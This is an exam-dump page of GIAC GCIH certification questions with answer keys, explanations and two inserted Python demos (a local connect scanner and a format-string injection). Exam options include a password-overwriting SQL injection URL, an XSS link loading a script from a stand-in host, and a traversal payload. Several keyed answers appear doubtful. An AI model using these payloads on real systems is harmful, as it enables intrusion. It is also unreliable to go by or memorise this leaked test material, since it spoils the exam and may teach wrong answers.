
[Aug-2023 Newly Released] GCIH Dumps for GIAC Information Security Certified
Updated Verified GCIH dumps Q&As - 100% Pass
GIAC GCIH (GIAC Certified Incident Handler) Certification Exam is designed to test and validate the skills and expertise of professionals who are responsible for managing and responding to security incidents. It is a highly respected and widely recognized certification program that is offered by the Global Information Assurance Certification (GIAC) organization. The GCIH certification exam is a rigorous test that assesses a candidate's knowledge of incident handling, incident response, and digital forensics.
NEW QUESTION # 125
CORRECT TEXT
Fill in the blank with the appropriate name of the rootkit.
A _______ rootkit uses device or platform firmware to create a persistent malware image.
Answer: firmware
NEW QUESTION # 126
John works as a professional Ethical Hacker. He has been assigned a project to test the security of www.we-are-secure.com. He performs Web vulnerability scanning on the We-are-secure server. The output of the scanning test is as follows:
C:\whisker.pl -h target_IP_address
-- whisker / v1.4.0 / rain forest puppy / www.wiretrip.net -- = - = - = - = - =
= Host: target_IP_address
= Server: Apache/1.3.12 (Win32) ApacheJServ/1.1
mod_ssl/2.6.4 OpenSSL/0.9.5a mod_perl/1.22
+ 200 OK: HEAD /cgi-bin/printenv
John recognizes the /cgi-bin/printenv vulnerability ('Printenv' vulnerability) on the We-are-secure server. Which of the following statements about the 'Printenv' vulnerability are true?
Each correct answer represents a complete solution. Choose all that apply.
- A. The countermeasure to 'printenv' vulnerability is to remove the CGI script.
- B. With the help of 'printenv' vulnerability, an attacker can input specially crafted links and/or other malicious scripts.
- C. 'Printenv' vulnerability maintains a log file of user activities on the Website, which may be useful for the attacker.
- D. This vulnerability helps in a cross site scripting attack.
Answer: A,B,D
Explanation:
The sample printenv CGI echoes its environment, including the query string and request headers, back to the client without escaping, so markup supplied in a crafted link is reflected into the response (cross site scripting). It keeps no log of user activity; removing the script closes the hole.
NEW QUESTION # 127
Which of the following techniques is used when penetration testing is performed against a system with the objective of accessing unauthorized information residing inside a computer?
- A. Biometrician
- B. Port scanning
- C. Van Eck Phreaking
- D. Phreaking
Answer: B
NEW QUESTION # 128
Which of the following threats is a combination of worm, virus, and Trojan horse characteristics?
- A. Blended
- B. Heuristic
- C. Rootkits
- D. Spyware
Answer: A
NEW QUESTION # 129
Adam, a malicious hacker, wants to perform a reliable scan against a remote target. He is not concerned about being stealthy at this point.
Which of the following types of scan would be most accurate and reliable?
- A. TCP Connect scan
- B. FIN scan
- C. UDP scan
- D. ACK scan
Answer: A
Explanation:
A TCP Connect scan completes the full three-way handshake through the operating system's own connect() call, so the result does not depend on how the target's stack treats unusual flag combinations and needs no raw-socket privileges. The trade-off is noise: every probe is a real connection that the target application and its logs will see.
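As an added illustration (not part of the dump), the following Python performs the connect scan described above against a listener it starts itself on 127.0.0.1, so it runs offline. The state mapping follows what the OS reports for a full connect(): success means SYN/ACK (open), ECONNREFUSED means RST (closed), a timeout or unreachable error means the probe was dropped or rejected upstream (filtered). Host, ports and worker count are constructed for the demo.

```python
import socket
from concurrent.futures import ThreadPoolExecutor


def connect_scan_port(host: str, port: int, timeout: float = 1.0) -> str:
    """Classify one port from the outcome of a full TCP connect().

    SYN/ACK  -> connect() returns            -> "open"
    RST      -> ConnectionRefusedError       -> "closed"
    silence  -> socket.timeout               -> "filtered"
    ICMP unreachable -> other OSError        -> "filtered"
    """
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        try:
            s.connect((host, port))
            return "open"
        except ConnectionRefusedError:      # must precede OSError (its parent)
            return "closed"
        except (socket.timeout, OSError):
            return "filtered"


def connect_scan(host: str, ports, timeout: float = 1.0, workers: int = 32) -> dict:
    """Scan a list of ports concurrently; returns {port: state}."""
    ports = list(ports)
    with ThreadPoolExecutor(max_workers=workers) as pool:
        states = pool.map(lambda p: connect_scan_port(host, p, timeout), ports)
        return dict(zip(ports, states))


def demo_against_local_listener():
    """Constructed target: one listening socket (open) and one port that was
    bound then released so nothing listens there (closed -> RST)."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))
    listener.listen(5)
    open_port = listener.getsockname()[1]

    probe = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    probe.bind(("127.0.0.1", 0))
    closed_port = probe.getsockname()[1]
    probe.close()

    try:
        results = connect_scan("127.0.0.1", [open_port, closed_port])
        return results, open_port, closed_port
    finally:
        listener.close()


if __name__ == "__main__":
    results, o, c = demo_against_local_listener()
    for port, state in sorted(results.items()):
        print(f"127.0.0.1:{port} {state}")
```

The handshake completes even though the demo never calls accept() on the listener, which is exactly why a connect scan is reliable: the kernel, not the application, answers the SYN. FIN, XMAS and ACK scans need raw sockets and depend on RFC 793 behaviour that many stacks do not follow.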
NEW QUESTION # 130
John works as a professional Ethical Hacker. He has been assigned the project of testing the security of www.we-are-secure.com. He has successfully completed the following steps of the pre-attack phase:
- Information gathering
- Determining network range
- Identifying active machines
- Finding open ports and applications
- OS fingerprinting
- Fingerprinting services
Now John wants to perform network mapping of the We-are-secure network. Which of the following tools can he use to accomplish his task?
Each correct answer represents a complete solution. Choose all that apply.
- A. NeoTrace
- B. Ettercap
- C. Cheops
- D. Traceroute
Answer: A,C,D
NEW QUESTION # 131
Which of the following programs is used to bypass normal authentication in order to retain remote access to a computer?
- A. Worm
- B. Adware
- C. Spyware
- D. Backdoor
Answer: D
NEW QUESTION # 132
OutGuess is used for __________ attack.
- A. SQL injection
- B. Man-in-the-middle
- C. Steganography
- D. Web password cracking
Answer: C
NEW QUESTION # 133
Which of the following is used to determine the operating system on the remote computer in a network environment?
- A. Spoofing
- B. Reconnaissance
- C. OS Fingerprinting
- D. Social engineering
Answer: C
NEW QUESTION # 134
Which of the following statements are true about tcp wrappers?
Each correct answer represents a complete solution. Choose all that apply.
- A. tcp wrapper protects a Linux server from IP address spoofing.
- B. tcp wrapper allows host or subnetwork IP addresses, names and/or ident query replies, to be used as tokens to filter for access control purposes.
- C. When a user uses a TCP wrapper, the inetd daemon runs the wrapper program tcpd instead of running the server program directly.
- D. tcp wrapper provides access control, host address spoofing, client username lookups, etc.
Answer: B,C,D
NEW QUESTION # 135
The IT administrator wants to implement a stronger security policy. What are the four most important security priorities for PassGuide Software Systems Pvt. Ltd.?
- A. Providing secure communications between the overseas office and the headquarters.
- B. Preventing denial-of-service attacks.
- C. Implementing Certificate services on Texas office.
- D. Protecting employee data on portable computers.
- E. Ensuring secure authentication.
- F. Providing two-factor authentication.
- G. Preventing unauthorized network access.
- H. Providing secure communications between Washington and the headquarters office.
Answer: A,D,E,G
NEW QUESTION # 136
Adam works as a Security Administrator for Umbrella Inc. A project has been assigned to him to secure access to the network of the company from all possible entry points. He segmented the network into several subnets and installed firewalls all over the network. He has placed very stringent rules on all the firewalls, blocking everything in and out except the ports that must be used. He does need to have port 80 open since his company hosts a website that must be accessed from the Internet. Adam is still worried about programs like GIACing2 that can get into a network through covert channels.
Which of the following is the most effective way to protect the network of the company from an attacker using GIACing2 to scan his internal network?
- A. Block ICMP type 3 messages
- B. Block all outgoing traffic on port 21
- C. Block all outgoing traffic on port 53
- D. Block ICMP type 13 messages
Answer: D
NEW QUESTION # 137
Which of the following statements are true about worms?
Each correct answer represents a complete solution. Choose all that apply.
- A. One feature of worms is keystroke logging.
- B. Worms cause harm to the network by consuming bandwidth, whereas viruses almost always corrupt or modify files on a targeted computer.
- C. Worms can exist inside files such as Word or Excel documents.
- D. Worms replicate themselves from one system to another without using a host file.
Answer: B,C,D
NEW QUESTION # 138
Which of the following HTTP requests is the SQL injection attack?
- A. http://www.victim.com/example?accountnumber=67891&creditamount=999999999
- B. http://www.myserver.com/script.php?mydata=%3cscript%20src=%22http%3a%2f%2fwww.yourserver.c0m%2fbadscript.js%22%3e%3c%2fscript%3e
- C. http://www.xsecurity.com/cgiin/bad.cgi?foo=..%fc%80%80%80%80%af../bin/ls%20-al
- D. http://www.myserver.com/search.asp?lname=adam%27%3bupdate%20usertable%20set%20passwd%3d%27hCx0r%27%3b--%00
Answer: D
Explanation:
Decoded, D reads lname=adam';update usertable set passwd='hCx0r';-- followed by a null byte: the quote closes the intended string literal, the semicolon appends a second statement and the comment discards the rest of the original query. B is reflected cross site scripting, C is directory traversal using an overlong UTF-8 encoding of '/', and A is parameter tampering with no SQL syntax at all.
NEW QUESTION # 139
Which of the following types of malware can an antivirus application disable and destroy?
Each correct answer represents a complete solution. Choose all that apply.
- A. Crimeware
- B. Virus
- C. Adware
- D. Rootkit
- E. Worm
- F. Trojan
Answer: B,D,E,F
NEW QUESTION # 140
Adam works as a Senior Programmer for Umbrella Inc. A project has been assigned to him to write a short program to gather user input for a Web application. He wants to keep his program neat and simple. He chooses to use printf(str) where he should have used printf("%s", str).
What attack will his program expose the Web application to?
- A. SQL injection attack
- B. Format string attack
- C. Cross Site Scripting attack
- D. Sequence++ attack
Answer: B
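The mistake is the same in any language with a format mini-language: untrusted input becomes the format string instead of an argument to it. As an added example (not part of the dump, and a Python analogue rather than the C printf case the question describes), the block below shows the printf(str) shape in Python's str.format, where a crafted placeholder walks from a passed-in object to the module globals and reads a secret; the printf("%s", str) shape beside it; and a whitelisting Formatter for the case where users legitimately need placeholders. Config, SECRET_KEY and the attack template are constructed for the demo.

```python
import string

# A module-level secret of the kind that leaks through __globals__ (constructed).
SECRET_KEY = "constructed-secret-value"


class Config:
    """Hypothetical application object handed to the template renderer."""
    def __init__(self) -> None:
        self.name = "orders-api"


def render_vulnerable(template: str) -> str:
    # The printf(str) mistake: untrusted input IS the format string, so its
    # directives are interpreted. In str.format that means attribute and
    # index traversal on every object passed as an argument.
    return template.format(cfg=Config())


def render_fixed(template: str) -> str:
    # The printf("%s", str) shape: constant format string, untrusted value is
    # substituted as data and never interpreted.
    return "{}".format(template)


class SafeFormatter(string.Formatter):
    """Only flat, whitelisted field names resolve; "a.b" and "a[b]" are refused
    before any attribute or item lookup happens."""
    def __init__(self, allowed) -> None:
        super().__init__()
        self.allowed = frozenset(allowed)

    def get_field(self, field_name, args, kwargs):
        if field_name not in self.allowed:
            raise KeyError(f"placeholder {field_name!r} is not allowed")
        return kwargs[field_name], field_name


def render_whitelisted(template: str) -> str:
    # Users may reference {name} and nothing else.
    return SafeFormatter({"name"}).format(template, name=Config().name)


# Attacker-controlled template (constructed): bound method -> function
# -> its __globals__ -> the secret.
ATTACK = "{cfg.__init__.__globals__[SECRET_KEY]}"


if __name__ == "__main__":
    print("vulnerable :", render_vulnerable(ATTACK))
    print("fixed      :", render_fixed(ATTACK))
    print("whitelisted:", render_whitelisted("hello {name}"))
```

The fixed version is the right default: treat input as data. Reach for the whitelisting formatter only when a feature genuinely requires user-authored templates, and keep the allowed set to plain names.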
NEW QUESTION # 141
In which of the following attacking methods does an attacker distribute incorrect IP addresses?
- A. Man-in-the-middle
- B. DNS poisoning
- C. Mac flooding
- D. IP spoofing
Answer: B
NEW QUESTION # 142
You work as a Network Administrator for Perfect Solutions Inc. The company has a Linux-based network. You are working as the root user on the Linux operating system. Your company is facing an IP spoofing attack. Which of the following tools will you use to get an alert that an incoming IP packet is spoofed?
- A. Despoof
- B. Dsniff
- C. ethereal
- D. Neotrace
Answer: A
NEW QUESTION # 143
When you conduct XMAS scanning using Nmap, you find that most of the ports scanned do not give a response. What can be the state of these ports?
- A. Closed
- B. Open
- C. Filtered
Answer: B
Explanation:
A closed port answers the FIN/PSH/URG probe with a RST. A port that stays silent is either open or sits behind a filter that drops the probe, which Nmap reports as open|filtered; only a RST or an ICMP unreachable message lets it decide.
NEW QUESTION # 144
Adam works as a Penetration Tester for Umbrella Inc. A project has been assigned to him to check the security of the company's wireless network. He re-injects a captured wireless packet back onto the network. He does this hundreds of times within a second. The packet is correctly encrypted and Adam assumes it is an ARP request packet. The wireless host responds with a stream of responses, all individually encrypted with different IVs.
Which of the following types of attack is Adam performing?
- A. Network injection attack
- B. MAC Spoofing attack
- C. Caffe Latte attack
- D. Replay attack
Answer: D
NEW QUESTION # 145
You are responsible for security at a company that uses a lot of Web applications. You are most concerned about flaws in those applications allowing some attacker to get into your network. What method would be best for finding such flaws?
- A. Vulnerability scanning
- B. Manual penetration testing
- C. Automated penetration testing
- D. Code review
Answer: A
NEW QUESTION # 146
Your friend plans to install a Trojan on your computer. He knows that if he gives you a new version of chess.exe, you will definitely install the game on your computer. He picks up a Trojan and joins it with chess.exe. Which of the following tools are required in such a scenario?
Each correct answer represents a part of the solution. Choose three.
- A. NetBus
- B. Absinthe
- C. Chess.exe
- D. Yet Another Binder
Answer: A,C,D
NEW QUESTION # 147
Which of the following HTTP requests is the SQL injection attack?
- A. http://www.myserver.com/search.asp?lname=adam%27%3bupdate%20usertable%20set%20passwd%3d%27hCx0r%27%3b--%00
- B. http://www.myserver.com/script.php?mydata=%3cscript%20src=%22http%3a%2f%2fwww.yourserver.c0m%2fbadscript.js%22%3e%3c%2fscript%3e
- C. http://www.victim.com/example?accountnumber=67891&creditamount=999999999
- D. http://www.xsecurity.com/cgiin/bad.cgi?foo=..%fc%80%80%80%80%af../bin/ls%20-al
Answer: A
NEW QUESTION # 148
......
GIAC GCIH exam covers a wide range of topics such as incident handling process, network protocols, malware analysis, intrusion detection, and response. GCIH exam is designed to test the candidate's ability to detect, analyze, and respond to security incidents efficiently. GIAC Certified Incident Handler certification program is designed for professionals who are involved in incident handling, response, and management, such as security analysts, incident responders, security engineers, and security consultants. GIAC Certified Incident Handler certification program is also suitable for those who wish to enhance their cybersecurity skills and knowledge.
Latest GCIH Exam Dumps GIAC Exam from Training: https://www.pdfdumps.com/GCIH-valid-exam.html
New 2023 Latest Questions GCIH Dumps - Use Updated GIAC Exam: https://drive.google.com/open?id=1naY0qJ2dXCJF9KergOc5rFmXQxcPXE8_